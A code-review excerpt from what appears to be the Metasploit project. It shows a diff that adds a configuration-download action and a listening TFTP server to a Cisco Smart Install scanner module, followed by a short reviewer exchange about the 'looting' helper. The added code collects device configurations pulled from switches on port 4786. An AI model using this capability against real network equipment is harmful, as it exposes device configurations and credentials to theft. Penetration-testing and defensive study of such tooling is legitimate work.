modules/auxiliary/scanner/misc/cisco_smart_install.rb

```diff
@@ -28,17 +29,91 @@ def initialize(info = {})
             ['URL', 'https://github.com/Sab0tag3d/SIET']
 
           ],
-        'License'        => MSF_LICENSE
+        'License'        => MSF_LICENSE,
+        'DefaultAction' => 'SCAN',
+        'Actions' => [
+          ['SCAN', {'Description' => 'Scan for instances communicating via Smart Install Protocol (default)'}],
+          ['DOWNLOAD', {'Description' => 'Retrieve configuration via Smart Install Protocol'}]
+        ],
       )
     )
 
     register_options(
       [
-        Opt::RPORT(4786)
+        Opt::RPORT(4786),
+        OptAddressLocal.new('LHOST', [ false, "The IP address of the system running this module" ]),
+        OptInt.new('SLEEP', [ true, "Time to wait for config to come back", 60])
       ]
     )
   end
 
+  def start_tftp
+    print_status("Starting TFTP Server...")
+    @tftp = Rex::Proto::TFTP::Server.new(69, '0.0.0.0', { 'Msf' => framework, 'MsfExploit' => self })
+    @tftp.incoming_file_hook = Proc.new{|info| process_incoming(info) }
+    @tftp.start
+    add_socket(@tftp.sock)
+
+    @main_thread = ::Thread.current
+  end
+
+  def cleanup
+    # Cleanup is called once for every single thread
+    if ::Thread.current == @main_thread
+      # Wait 5 seconds for background transfers to complete
+      print_status("Providing some time for transfers to complete...")
+      ::IO.select(nil, nil, nil, 5.0)
+
+      print_status("Shutting down the TFTP service...")
+      if @tftp
+        @tftp.close rescue nil
+        @tftp = nil
+      end
+    end
+  end
+
+  #
+  # Callback for incoming files
+  #
+  def process_incoming(info)
+    return if not info[:file]
+    name = info[:file][:name]
+    data = info[:file][:data]
+    from = info[:from]
+    return if not (name and data)
+
+    # Trim off IPv6 mapped IPv4 if necessary
+    from = from[0].dup
+    from.gsub!('::ffff:', '')
+
+    print_status("Incoming file from #{from} - #{name} #{data.length} bytes")
+    cisco_ios_config_eater(from, 4786, data)
+    # Save the configuration file if a path is specified
```

Comment:
Is this better off put in `cisco_ios_config_eater`, since that is already looting/etc this all?

Reply:
Ah yes! I thought i'd removed it...i guess not xD.